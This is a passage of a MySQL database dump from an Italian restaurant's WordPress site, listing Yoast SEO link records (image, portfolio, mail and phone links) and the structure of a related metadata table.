LL,NULL,NULL),(940,'mailto:work@attika.ny',3056,0,'external',768,NULL,NULL,NULL,NULL,NULL,NULL),(941,'//www.ristorantesolymar.it/wp-content/uploads/2015/07/11059770_10154021915942738_6099049076285366168_n.jpg',3056,67,'image-in',768,55,514,960,163027,NULL,NULL),(942,'//www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1441.jpg',3056,135,'image-in',768,58,675,900,101397,NULL,NULL),(943,'//www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1409.jpg',3056,134,'image-in',768,57,675,900,113099,NULL,NULL),(944,'//www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1608.jpg',3056,137,'image-in',768,60,675,900,165156,NULL,NULL),(945,'//www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1444.jpg',3056,136,'image-in',768,59,675,900,105879,NULL,NULL),(946,'//www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1922.jpg',3056,138,'image-in',768,61,675,900,100760,NULL,NULL),(947,'//www.ristorantesolymar.it/wp-content/uploads/2015/07/foto_cucina.jpg',3056,40,'image-in',768,54,810,810,90153,NULL,NULL),(948,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-1-1.jpg',3056,2720,'image-in',768,654,679,1200,104148,NULL,NULL),(949,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-2-1.jpg',3056,2721,'image-in',768,658,679,1200,102338,NULL,NULL),(950,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-3-1.jpg',3056,2722,'image-in',768,665,679,1200,108570,NULL,NULL),(951,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-4.jpg',3056,2020,'image-in',768,604,1100,1708,112673,NULL,NULL),(952,'http://attika.mikado-themes.com#resto',3068,0,'external',780,NULL,NULL,NULL,NULL,NULL,NULL),(953,'http://attika.mikado-themes.com#cocktails',3068,0,'external',780,NULL,NULL,NULL,NULL,NULL,NULL),(954,'http://attika.mikado-themes.com#drinks',3068,0,'external',780,NULL,NULL,NULL,NULL,NULL,NULL),(955,'http://attika.mikado-themes.com#visitus',3068,0,'external',780,NULL,NULL,NULL,NULL,NULL,NULL),(956,'http://attika.mikado-themes.com/landing',3068,0,'external',780,NULL,NULL,NULL,NULL,NULL,NULL),(957,'mailto:work@attika.ny',3068,0,'external',780,NULL,NULL,NULL,NULL,NULL,NULL),(958,'mailto:events@attika.ny',3068,0,'external',780,NULL,NULL,NULL,NULL,NULL,NULL),(959,'mailto:info@attika.ny',3068,0,'external',780,NULL,NULL,NULL,NULL,NULL,NULL),(960,'//www.ristorantesolymar.it/wp-content/uploads/2015/07/11059770_10154021915942738_6099049076285366168_n.jpg',3068,67,'image-in',780,55,514,960,163027,NULL,NULL),(961,'//www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1441.jpg',3068,135,'image-in',780,58,675,900,101397,NULL,NULL),(962,'//www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1409.jpg',3068,134,'image-in',780,57,675,900,113099,NULL,NULL),(963,'//www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1608.jpg',3068,137,'image-in',780,60,675,900,165156,NULL,NULL),(964,'//www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1444.jpg',3068,136,'image-in',780,59,675,900,105879,NULL,NULL),(965,'//www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1922.jpg',3068,138,'image-in',780,61,675,900,100760,NULL,NULL),(966,'//www.ristorantesolymar.it/wp-content/uploads/2015/07/foto_cucina.jpg',3068,40,'image-in',780,54,810,810,90153,NULL,NULL),(967,'',3068,0,'image-in',780,NULL,NULL,NULL,NULL,NULL,NULL),(968,'',3068,0,'image-in',780,NULL,NULL,NULL,NULL,NULL,NULL),(969,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-3.jpg',3068,1828,'image-in',780,578,316,508,104457,NULL,NULL),(970,'',3068,0,'image-in',780,NULL,NULL,NULL,NULL,NULL,NULL),(971,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-7a.png',3068,1488,'image-in',780,540,644,340,123205,NULL,NULL),(972,'',3068,0,'image-in',780,NULL,NULL,NULL,NULL,NULL,NULL),(973,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-10a.png',3068,1507,'image-in',780,547,516,508,247107,NULL,NULL),(974,'',3068,0,'image-in',780,NULL,NULL,NULL,NULL,NULL,NULL),(975,'',3068,0,'image-in',780,NULL,NULL,NULL,NULL,NULL,NULL),(976,'',3068,0,'image-in',780,NULL,NULL,NULL,NULL,NULL,NULL),(977,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-14a.jpg',3068,2200,'image-in',780,630,510,376,102574,NULL,NULL),(978,'https://www.ristorantesolymar.it/portfolio-item/cold-raspberry/',2627,618,'internal',820,832,NULL,NULL,NULL,NULL,NULL),(979,'https://www.ristorantesolymar.it/portfolio-item/cold-raspberry/',2627,618,'internal',820,832,NULL,NULL,NULL,NULL,NULL),(980,'https://www.ristorantesolymar.it/portfolio-item/green-soup/',2627,3084,'internal',820,833,NULL,NULL,NULL,NULL,NULL),(981,'https://www.ristorantesolymar.it/portfolio-item/green-soup/',2627,3084,'internal',820,833,NULL,NULL,NULL,NULL,NULL),(982,'https://www.ristorantesolymar.it/portfolio-item/the-fresh-pate/',2627,3085,'internal',820,834,NULL,NULL,NULL,NULL,NULL),(983,'https://www.ristorantesolymar.it/portfolio-item/the-fresh-pate/',2627,3085,'internal',820,834,NULL,NULL,NULL,NULL,NULL),(984,'https://www.ristorantesolymar.it/portfolio-item/peach-sorbet/',2627,3086,'internal',820,835,NULL,NULL,NULL,NULL,NULL),(985,'https://www.ristorantesolymar.it/portfolio-item/peach-sorbet/',2627,3086,'internal',820,835,NULL,NULL,NULL,NULL,NULL),(986,'https://www.ristorantesolymar.it/portfolio-item/season-to-taste/',2627,3087,'internal',820,836,NULL,NULL,NULL,NULL,NULL),(987,'https://www.ristorantesolymar.it/portfolio-item/season-to-taste/',2627,3087,'internal',820,836,NULL,NULL,NULL,NULL,NULL),(988,'https://www.ristorantesolymar.it/portfolio-item/red-dream/',2627,3089,'internal',820,838,NULL,NULL,NULL,NULL,NULL),(989,'https://www.ristorantesolymar.it/portfolio-item/red-dream/',2627,3089,'internal',820,838,NULL,NULL,NULL,NULL,NULL),(990,'https://www.ristorantesolymar.it/portfolio-item/tuna-salad/',2627,3088,'internal',820,837,NULL,NULL,NULL,NULL,NULL),(991,'https://www.ristorantesolymar.it/portfolio-item/tuna-salad/',2627,3088,'internal',820,837,NULL,NULL,NULL,NULL,NULL),(992,'https://www.ristorantesolymar.it/portfolio-item/green-magic/',2627,3090,'internal',820,839,NULL,NULL,NULL,NULL,NULL),(993,'https://www.ristorantesolymar.it/portfolio-item/green-magic/',2627,3090,'internal',820,839,NULL,NULL,NULL,NULL,NULL),(994,'https://www.ristorantesolymar.it/portfolio-item/ice-dream/',2627,3091,'internal',820,840,NULL,NULL,NULL,NULL,NULL),(995,'https://www.ristorantesolymar.it/portfolio-item/ice-dream/',2627,3091,'internal',820,840,NULL,NULL,NULL,NULL,NULL),(996,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0182.jpg',2627,1202,'internal',820,351,NULL,NULL,NULL,NULL,NULL),(997,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0181.jpg',2627,1201,'internal',820,350,NULL,NULL,NULL,NULL,NULL),(998,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0066.jpg',2627,1200,'internal',820,349,NULL,NULL,NULL,NULL,NULL),(999,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0122.jpg',2627,1182,'internal',820,331,NULL,NULL,NULL,NULL,NULL),(1000,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0093-1.jpg',2627,1181,'internal',820,330,NULL,NULL,NULL,NULL,NULL),(1001,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0095-1.jpg',2627,1180,'internal',820,329,NULL,NULL,NULL,NULL,NULL),(1002,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0100-1.jpg',2627,1179,'internal',820,328,NULL,NULL,NULL,NULL,NULL),(1003,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0101-1.jpg',2627,1178,'internal',820,327,NULL,NULL,NULL,NULL,NULL),(1004,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0126.jpg',2627,1177,'internal',820,326,NULL,NULL,NULL,NULL,NULL),(1005,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0139.jpg',2627,1176,'internal',820,325,NULL,NULL,NULL,NULL,NULL),(1006,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0076-1.jpg',2627,1174,'internal',820,324,NULL,NULL,NULL,NULL,NULL),(1007,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0182.jpg',2627,1202,'image-in',820,351,853,1280,820828,NULL,NULL),(1008,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0181.jpg',2627,1201,'image-in',820,350,1280,853,1036361,NULL,NULL),(1009,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0066.jpg',2627,1200,'image-in',820,349,853,1280,604193,NULL,NULL),(1010,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0122.jpg',2627,1182,'image-in',820,331,1280,853,573261,NULL,NULL),(1011,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0093-1.jpg',2627,1181,'image-in',820,330,1280,853,743992,NULL,NULL),(1012,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0095-1.jpg',2627,1180,'image-in',820,329,853,1280,1109093,NULL,NULL),(1013,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0100-1.jpg',2627,1179,'image-in',820,328,853,1280,558591,NULL,NULL),(1014,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0101-1.jpg',2627,1178,'image-in',820,327,853,1280,1045773,NULL,NULL),(1015,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0126.jpg',2627,1177,'image-in',820,326,853,1280,612150,NULL,NULL),(1016,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0139.jpg',2627,1176,'image-in',820,325,853,1280,620920,NULL,NULL),(1017,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0076-1.jpg',2627,1174,'image-in',820,324,853,1280,503382,NULL,NULL),(1018,'https://www.ristorantesolymar.it/portfolio-item/mk-fruit-2/',3055,2930,'internal',767,862,NULL,NULL,NULL,NULL,NULL),(1019,'https://www.ristorantesolymar.it/portfolio-item/salad-2/',3055,2931,'internal',767,871,NULL,NULL,NULL,NULL,NULL),(1020,'https://www.ristorantesolymar.it/portfolio-item/sushi-2/',3055,2933,'internal',767,873,NULL,NULL,NULL,NULL,NULL),(1021,'https://www.ristorantesolymar.it/portfolio-item/garden-salad-2/',3055,2932,'internal',767,872,NULL,NULL,NULL,NULL,NULL),(1022,'https://www.ristorantesolymar.it/portfolio-item/home-salad-2/',3055,2934,'internal',767,874,NULL,NULL,NULL,NULL,NULL),(1023,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-9-1.jpg',3055,2353,'image-in',767,627,1100,1920,109831,NULL,NULL),(1024,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-4a.jpg',3055,2351,'image-in',767,612,820,1200,106005,NULL,NULL),(1025,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-6-1.jpg',3055,2349,'image-in',767,603,1100,1920,112826,NULL,NULL),(1026,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-10.jpg',3055,2204,'image-in',767,641,1100,1920,106006,NULL,NULL),(1248,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/opening-hours-single-img.jpg',4035,2120,'image-in',1881,621,258,330,0,NULL,NULL),(1241,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0101-1.jpg',3040,1178,'image-in',752,327,853,1280,1045773,NULL,NULL),(1242,'https://www.ristorantesolymar.it/mio-account/',3981,210,'internal',1828,51,NULL,NULL,NULL,NULL,NULL),(1243,'https://www.ristorantesolymar.it/mio-account/',3986,210,'internal',1833,51,NULL,NULL,NULL,NULL,NULL),(1246,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/opening-hours-single-img.jpg',3059,2120,'image-in',771,621,258,330,0,NULL,NULL),(1240,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0126.jpg',3040,1177,'image-in',752,326,853,1280,612150,NULL,NULL),(1238,'',3040,0,'image-in',752,NULL,NULL,NULL,NULL,NULL,NULL),(1239,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0055.jpg',3040,1199,'image-in',752,348,853,1280,1750088,NULL,NULL),(1237,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1922.jpg',3040,138,'image-in',752,61,675,900,100760,NULL,NULL),(1231,'http://attika.mikado-themes.com/fine-dinning-concept/',3040,0,'external',752,NULL,NULL,NULL,NULL,NULL,NULL),(1232,'https://www.ristorantesolymar.it/opening-hours/',3040,3059,'internal',752,771,NULL,NULL,NULL,NULL,NULL),(1233,'mailto:info@ristorantesolymar.it',3040,0,'external',752,NULL,NULL,NULL,NULL,NULL,NULL),(1229,'#',3040,0,'internal',752,NULL,NULL,NULL,NULL,NULL,NULL),(1230,'http://attika.mikado-themes.com/fine-dinning-concept/',3040,0,'external',752,NULL,NULL,NULL,NULL,NULL,NULL),(1228,'https://www.ristorantesolymar.it/portfolio-item/a-taste-of-heaven/',3040,3077,'internal',752,825,NULL,NULL,NULL,NULL,NULL),(1227,'https://www.ristorantesolymar.it/portfolio-category/food/',3040,0,'internal',752,432,NULL,NULL,NULL,NULL,NULL),(1222,'javascript:void(0)',3040,0,'external',752,NULL,NULL,NULL,NULL,NULL,NULL),(1223,'https://www.ristorantesolymar.it/portfolio-category/food/',3040,0,'internal',752,432,NULL,NULL,NULL,NULL,NULL),(1224,'https://www.ristorantesolymar.it/portfolio-item/seasoning-time/',3040,3075,'internal',752,823,NULL,NULL,NULL,NULL,NULL),(1225,'https://www.ristorantesolymar.it/portfolio-category/food/',3040,0,'internal',752,432,NULL,NULL,NULL,NULL,NULL),(1226,'https://www.ristorantesolymar.it/portfolio-item/italian-kiss/',3040,3076,'internal',752,824,NULL,NULL,NULL,NULL,NULL),(1102,'#',3441,0,'internal',1273,NULL,NULL,NULL,NULL,NULL,NULL),(1103,'https://www.ristorantesolymar.it/portfolio-item/chocolate-sphere/',3441,3092,'internal',1273,843,NULL,NULL,NULL,NULL,NULL),(1104,'https://www.ristorantesolymar.it/portfolio-item/chocolate-sphere/',3441,3092,'internal',1273,843,NULL,NULL,NULL,NULL,NULL),(1105,'https://www.ristorantesolymar.it/portfolio-item/strawberry-sauce/',3441,3093,'internal',1273,844,NULL,NULL,NULL,NULL,NULL),(1106,'https://www.ristorantesolymar.it/portfolio-item/strawberry-sauce/',3441,3093,'internal',1273,844,NULL,NULL,NULL,NULL,NULL),(1107,'https://www.ristorantesolymar.it/portfolio-item/spanish-kiss/',3441,3094,'internal',1273,845,NULL,NULL,NULL,NULL,NULL),(1108,'https://www.ristorantesolymar.it/portfolio-item/spanish-kiss/',3441,3094,'internal',1273,845,NULL,NULL,NULL,NULL,NULL),(1109,'https://www.ristorantesolymar.it/portfolio-item/peach-sorbet-2/',3441,2942,'internal',1273,882,NULL,NULL,NULL,NULL,NULL),(1110,'https://www.ristorantesolymar.it/portfolio-item/peach-sorbet-2/',3441,2942,'internal',1273,882,NULL,NULL,NULL,NULL,NULL),(1111,'#',3441,0,'internal',1273,NULL,NULL,NULL,NULL,NULL,NULL),(1112,'https://vimeo.com/183648707',3441,0,'external',1273,NULL,NULL,NULL,NULL,NULL,NULL),(1113,'#',3441,0,'internal',1273,NULL,NULL,NULL,NULL,NULL,NULL),(1114,'mailto:info@attika.ny',3441,0,'external',1273,NULL,NULL,NULL,NULL,NULL,NULL),(1115,'mailto:press@attika.ny',3441,0,'external',1273,NULL,NULL,NULL,NULL,NULL,NULL),(1116,'mailto:work@attika.ny',3441,0,'external',1273,NULL,NULL,NULL,NULL,NULL,NULL),(1117,'mailto:work@attika.ny',3441,0,'external',1273,NULL,NULL,NULL,NULL,NULL,NULL),(1118,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-1-1.jpg',3441,2720,'image-in',1273,654,679,1200,104148,NULL,NULL),(1119,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-2-1.jpg',3441,2721,'image-in',1273,658,679,1200,102338,NULL,NULL),(1120,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-3-1.jpg',3441,2722,'image-in',1273,665,679,1200,108570,NULL,NULL),(1121,'https://www.ristorantesolymar.it/wp-content/plugins/attika-core/post-types/portfolio/assets/img/portfolio_featured_image.jpg',3441,0,'image-in',1273,NULL,NULL,NULL,NULL,NULL,NULL),(1122,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-4.jpg',3441,2020,'image-in',1273,604,1100,1708,112673,NULL,NULL),(1123,'https://www.ristorantesolymar.it/wp-admin/post.php?post=3679&amp;action=edit',3680,0,'internal',1500,NULL,NULL,NULL,NULL,NULL,NULL),(1124,'tel:3408565027',3680,0,'external',1500,NULL,NULL,NULL,NULL,NULL,NULL),(1125,'tel:3408565027',3681,0,'external',1501,NULL,NULL,NULL,NULL,NULL,NULL),(1126,'https://www.ristorantesolymar.it/info-privacy/',3683,172,'internal',1503,152,NULL,NULL,NULL,NULL,NULL),(1127,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',3683,407,'image-in',1503,86,150,237,7722,NULL,NULL),(1128,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',3683,473,'image-in',1503,117,108,172,1789,NULL,NULL),(1129,'https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png',3683,551,'image-in',1503,36,800,616,241669,NULL,NULL),(1130,'https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1608809224solymarcouponXVWYM.png',3683,0,'image-in',1503,NULL,NULL,NULL,NULL,NULL,NULL),(1131,'https://www.ristorantesolymar.it/info-privacy/',3685,172,'internal',1505,152,NULL,NULL,NULL,NULL,NULL),(1132,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',3685,407,'image-in',1505,86,150,237,7722,NULL,NULL),(1133,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',3685,473,'image-in',1505,117,108,172,1789,NULL,NULL),(1134,'https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png',3685,551,'image-in',1505,36,800,616,241669,NULL,NULL),(1135,'https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1608809229solymarcoupon74KG4.png',3685,0,'image-in',1505,NULL,NULL,NULL,NULL,NULL,NULL),(1136,'https://www.ristorantesolymar.it/wp-admin/post.php?post=3687&amp;action=edit',3688,0,'internal',1508,NULL,NULL,NULL,NULL,NULL,NULL),(1137,'mailto:c.lorenzetti@inwind.it',3688,0,'external',1508,NULL,NULL,NULL,NULL,NULL,NULL),(1138,'tel:3382950071',3688,0,'external',1508,NULL,NULL,NULL,NULL,NULL,NULL),(1139,'mailto:c.lorenzetti@inwind.it',3689,0,'external',1509,NULL,NULL,NULL,NULL,NULL,NULL),(1140,'tel:3382950071',3689,0,'external',1509,NULL,NULL,NULL,NULL,NULL,NULL),(1141,'https://www.ristorantesolymar.it/info-privacy/',3691,172,'internal',1511,152,NULL,NULL,NULL,NULL,NULL),(1142,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',3691,407,'image-in',1511,86,150,237,7722,NULL,NULL),(1143,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png',3691,473,'image-in',1511,117,108,172,1789,NULL,NULL),(1144,'https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png',3691,551,'image-in',1511,36,800,616,241669,NULL,NULL),(1145,'https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1608820227solymarcouponW1FGS.png',3691,0,'image-in',1511,NULL,NULL,NULL,NULL,NULL,NULL),(1146,'https://www.ristorantesolymar.it/mio-account/',3692,210,'internal',1513,51,NULL,NULL,NULL,NULL,NULL),(1147,'https://www.ristorantesolymar.it/mio-account/',3693,210,'internal',1514,51,NULL,NULL,NULL,NULL,NULL),(1148,'https://www.ristorantesolymar.it/mio-account/',3694,210,'internal',1516,51,NULL,NULL,NULL,NULL,NULL),(1149,'https://www.ristorantesolymar.it/mio-account/',3695,210,'internal',1517,51,NULL,NULL,NULL,NULL,NULL),(1152,'https://www.ristorantesolymar.it/mio-account/',3704,210,'internal',1528,51,NULL,NULL,NULL,NULL,NULL),(1153,'https://www.ristorantesolymar.it/mio-account/',3972,210,'internal',1824,51,NULL,NULL,NULL,NULL,NULL),(1247,'#',4035,0,'internal',1881,NULL,NULL,NULL,NULL,NULL,NULL),(1234,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0052.jpg',3040,1198,'image-in',752,347,1280,853,614820,NULL,NULL),(1235,'',3040,0,'image-in',752,NULL,NULL,NULL,NULL,NULL,NULL),(1236,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1608.jpg',3040,137,'image-in',752,60,675,900,165156,NULL,NULL),(1392,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-blog-post-4.jpg',4598,1451,'image-in',2578,2231,1000,1300,100284,NULL,NULL),(1390,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-blog-post-2.jpg',4598,1449,'image-in',2578,2217,1230,1300,135501,NULL,NULL),(1389,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-blog-post-1.jpg',4598,1447,'image-in',2578,2208,1580,1300,113778,NULL,NULL),(1388,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-8a.jpg',4598,205,'image-in',2578,2154,680,409,55445,NULL,NULL),(1386,'',4598,0,'image-in',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1387,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-9a.jpg',4598,206,'image-in',2578,2159,274,400,44877,NULL,NULL),(1384,'',4598,0,'image-in',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1385,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-6.jpg',4598,156,'image-in',2578,2121,1224,800,112342,NULL,NULL),(1383,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1922.jpg',4598,138,'image-in',2578,61,675,900,100760,NULL,NULL),(1382,'https://www.ristorantesolymar.it/wp-content/uploads/2015/08/IMG_1608.jpg',4598,137,'image-in',2578,60,675,900,165156,NULL,NULL),(1380,'',4598,0,'image-in',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1381,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-img-13.jpg',4598,2135,'image-in',2578,2257,43,1,1464,NULL,NULL),(1379,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h1-img-1.png',4598,2910,'image-in',2578,2290,57,504,3416,NULL,NULL),(1378,'https://www.ristorantesolymar.it/category/healthy/',4598,0,'internal',2578,420,NULL,NULL,NULL,NULL,NULL),(1377,'https://www.ristorantesolymar.it/2018/08/',4598,0,'internal',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1362,'mailto:attika@qode.com',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1363,'https://www.ristorantesolymar.it/2018/08/16/lunch-is-on-the-table/',4598,1446,'internal',2578,1599,NULL,NULL,NULL,NULL,NULL),(1364,'https://www.ristorantesolymar.it/2018/08/16/lunch-is-on-the-table/',4598,1446,'internal',2578,1599,NULL,NULL,NULL,NULL,NULL),(1365,'https://www.ristorantesolymar.it/2018/08/',4598,0,'internal',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1366,'https://www.ristorantesolymar.it/category/healthy/',4598,0,'internal',2578,420,NULL,NULL,NULL,NULL,NULL),(1367,'https://www.ristorantesolymar.it/2018/08/16/great-recipes-the-chefs-recommendations/',4598,1454,'internal',2578,1600,NULL,NULL,NULL,NULL,NULL),(1368,'https://www.ristorantesolymar.it/2018/08/16/great-recipes-the-chefs-recommendations/',4598,1454,'internal',2578,1600,NULL,NULL,NULL,NULL,NULL),(1369,'https://www.ristorantesolymar.it/2018/08/',4598,0,'internal',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1370,'https://www.ristorantesolymar.it/category/healthy/',4598,0,'internal',2578,420,NULL,NULL,NULL,NULL,NULL),(1371,'https://www.ristorantesolymar.it/2018/08/16/new-meals-in-attika/',4598,1459,'internal',2578,1601,NULL,NULL,NULL,NULL,NULL),(1372,'https://www.ristorantesolymar.it/2018/08/16/new-meals-in-attika/',4598,1459,'internal',2578,1601,NULL,NULL,NULL,NULL,NULL),(1373,'https://www.ristorantesolymar.it/2018/08/',4598,0,'internal',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1374,'https://www.ristorantesolymar.it/category/healthy/',4598,0,'internal',2578,420,NULL,NULL,NULL,NULL,NULL),(1375,'https://www.ristorantesolymar.it/2018/08/16/how-to-be-healthier-with-a-balanced-plate/',4598,1462,'internal',2578,1602,NULL,NULL,NULL,NULL,NULL),(1376,'https://www.ristorantesolymar.it/2018/08/16/how-to-be-healthier-with-a-balanced-plate/',4598,1462,'internal',2578,1602,NULL,NULL,NULL,NULL,NULL),(1361,'mailto:attika@qode.com',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1359,'mailto:attika@qode.com',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1360,'mailto:attika@qode.com',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1358,'https://www.google.com/maps/place/New+York,+NY,+USA/@40.6976637,-74.119763,11z/data=!3m1!4b1!4m5!3m4!1s0x89c24fa5d33f083b:0xc80b8f06e177fe62!8m2!3d40.7127753!4d-74.0059728',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1345,'javascript:void(0)',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1346,'javascript:void(0)',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1347,'https://www.ristorantesolymar.it/portfolio-category/food/',4598,0,'internal',2578,432,NULL,NULL,NULL,NULL,NULL),(1348,'https://www.ristorantesolymar.it/portfolio-item/seasoning-time/',4598,3075,'internal',2578,823,NULL,NULL,NULL,NULL,NULL),(1349,'https://www.ristorantesolymar.it/portfolio-category/food/',4598,0,'internal',2578,432,NULL,NULL,NULL,NULL,NULL),(1350,'https://www.ristorantesolymar.it/portfolio-item/italian-kiss/',4598,3076,'internal',2578,824,NULL,NULL,NULL,NULL,NULL),(1351,'https://www.ristorantesolymar.it/portfolio-category/food/',4598,0,'internal',2578,432,NULL,NULL,NULL,NULL,NULL),(1352,'https://www.ristorantesolymar.it/portfolio-item/a-taste-of-heaven/',4598,3077,'internal',2578,825,NULL,NULL,NULL,NULL,NULL),(1353,'https://attika.qodeinteractive.com/big-chefs-recomend/',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1354,'https://attika.qodeinteractive.com/fine-dinning-concept/',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1355,'https://attika.qodeinteractive.com/fine-dinning-concept/',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1356,'https://www.opentable.com/r/ikoyi-reservations-london?restref=161697&#038;datetime=2018-08-28T19%3A00&#038;covers=1&#038;searchdatetime=2018-08-28T19%3A00&#038;partysize=1',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1357,'https://www.google.com/maps/place/35+Rainbow+Ridge+Dr,+Livingston,+NJ+07039,+USA/@40.8114217,-74.3334163,15.04z/data=!4m5!3m4!1s0x89c3a997640392e1:0xe5e9cdfe2711609c!8m2!3d40.8140015!4d-74.3310237',4598,0,'external',2578,NULL,NULL,NULL,NULL,NULL,NULL),(1391,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-blog-post-3.jpg',4598,1450,'image-in',2578,2225,1785,1300,128867,NULL,NULL);
/*!40000 ALTER TABLE `wp_yoast_seo_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_seo_meta`
--

DROP TABLE IF EXISTS `wp_yoast_seo_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_seo_meta` (
  `object_id` bigint(20) unsigned NOT NULL,
  `internal_link_count` int(10) unsigned DEFAULT NULL,
  `incoming_link_count` int(10) unsigned DEFAULT NULL,
  UNIQUE KEY `object_id` (`object_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_seo_meta`
--

